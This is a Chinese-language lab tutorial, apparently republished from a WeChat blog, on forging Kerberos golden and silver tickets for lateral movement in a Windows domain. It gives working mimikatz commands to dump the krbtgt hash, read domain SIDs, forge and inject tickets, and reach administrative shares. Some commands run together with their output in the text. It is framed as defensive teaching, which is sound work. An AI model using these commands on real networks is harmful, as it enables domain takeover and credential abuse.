横向移动-黄金白银票据

admin
admin
admin
140350
文章
117
评论
2021年5月26日21:14:05评论99 views字数 1885阅读6分17秒阅读模式
横向移动-黄金白银票据
一位苦于信息安全的萌新小白帽
本实验仅用于信息防御教学,切勿用于它用途
公众号:XG小刚

域缺点

回顾上文啊《横向移动-域的Kerberos协议

1.整个认证过程必须依赖域控服务器,它瘫痪了整个域凉凉
2.域控权利太大,整个域内主机hash都存放在域控服务器上,被拿下权限后相当于拿下了整个域,所以内网渗透的目标是拿域控
3.在整个认证过程并没有明文密码参与其中,全是用Hash进行各种操作,所以我们只要能获得hash,不用明文密码就可以进行攻击


TGT黄金票据

条件:拿下了域控主机,知道域控krbtgt账户hash

先看一下客户端请求TGS是怎样使用TGT
横向移动-黄金白银票据
其中TGT票据构造如下
横向移动-黄金白银票据
在域控服务器上除了administrator用户,还有一个krbtgt秘钥分发账户。

我们只需要知道域控hash,就可以随意伪造TGT黄金票据
TGT中的session key我们可以随意伪造,过期时间也可以设置为无限长
然后用伪造的session key加密与TGT内相同的客户端信息,发送给TGS肯定能通过验证。

实现
使用域内win2k8主机,账户DWin2k8
访问域控DC服务器,前提是拿下域控了,有了域管理员权限
1.使用mikikatz操作
导出krbtgt用户的NTML Hash
mimikatz.exe "lsadump::dcsync /user:krbtgt" exit34e3b5be902f17afa0ab65d9eb9499a6
msf:meterpreter> hashdump
横向移动-黄金白银票据

whoami查看域用户SID

除去最后数字段

whoami /allS-1-5-21-1402267840-133012738-3214165467
横向移动-黄金白银票据

wmic查看全部用户SID也行

wmic useraccount get name,sid
横向移动-黄金白银票据

2.伪造黄金票据
使用域控hash构造一个域内合法用户可用的TGT
mimikatz.exe "kerberos::golden /user:DWin2k8 /domain:test.com /sid:S-1-5-21-1402267840-133012738-3214165467 /krbtgt:34e3b5be902f17afa0ab65d9eb9499a6" exit
横向移动-黄金白银票据

3.清除当前已缓存的票据
mimikatz.exe "kerberos::purge" exitklist purge
横向移动-黄金白银票据

然后将黄金票据注入内存,就可以有权限访问域内各项服务了

mimikatz.exe "kerberos::ptt ticket.kirbi" exit
横向移动-黄金白银票据

4.列出域控的C盘,测试权限
dir \DCc$
横向移动-黄金白银票据

附视频操作

Ticket白银票据

条件:知道server hash

同理先看一下客户端请求服务器是怎样使用Ticket
横向移动-黄金白银票据
其中Ticket票据构造如下
横向移动-黄金白银票据
一样的方式我们只需要知道server hash,就可以随意伪造Ticket

Ticket中的server session key我们可以随意伪造,过期时间也可以设置为无限长
但是只能访问服务器指定服务。
然后用伪造的server session key加密与Ticket相同的客户端信息,发送给服务器进行即可通过验证。

实现
域内win7主机,账户DWin7
访问域内Win2k8服务器,账户DWin2k8
有了对应DWin2k8服务器的hash:fb283cd583e190ef968acbe8bb7b7fc3
1.使用mikikatz伪造白银票据
DWin2k8的cifs服务创建白银票据,获取访问服务器共享文件的权限
mimikatz.exe "kerberos::golden /user:DWin7 /service:cifs /domain:test.com /sid:S-1-5-21-1402267840-133012738-3214165467 /target:DWin2k8.test.com  /rc4:fb283cd583e190ef968acbe8bb7b7fc3" exit
/user是域内合法用户
/target目标服务器的全限定域名
/service运行在目标服务器上的kerberos服务,有cifs,http,mssql等
/rc4目标服务器的NTLM-hash
mimikatz.exe "kerberos::purge" exitklist purge
横向移动-黄金白银票据
然后将白银票据注入内存,就可以有权限访问该服务器的cifs服务了
mimikatz.exe "kerberos::ptt ticket.kirbi" exit
横向移动-黄金白银票据

3.列出域控的C盘,测试权限
dir \DWin2k8c$
横向移动-黄金白银票据

附视频操作

本文始发于微信公众号(XG小刚):横向移动-黄金白银票据

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月26日21:14:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   横向移动-黄金白银票据https://cn-sec.com/archives/271096.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息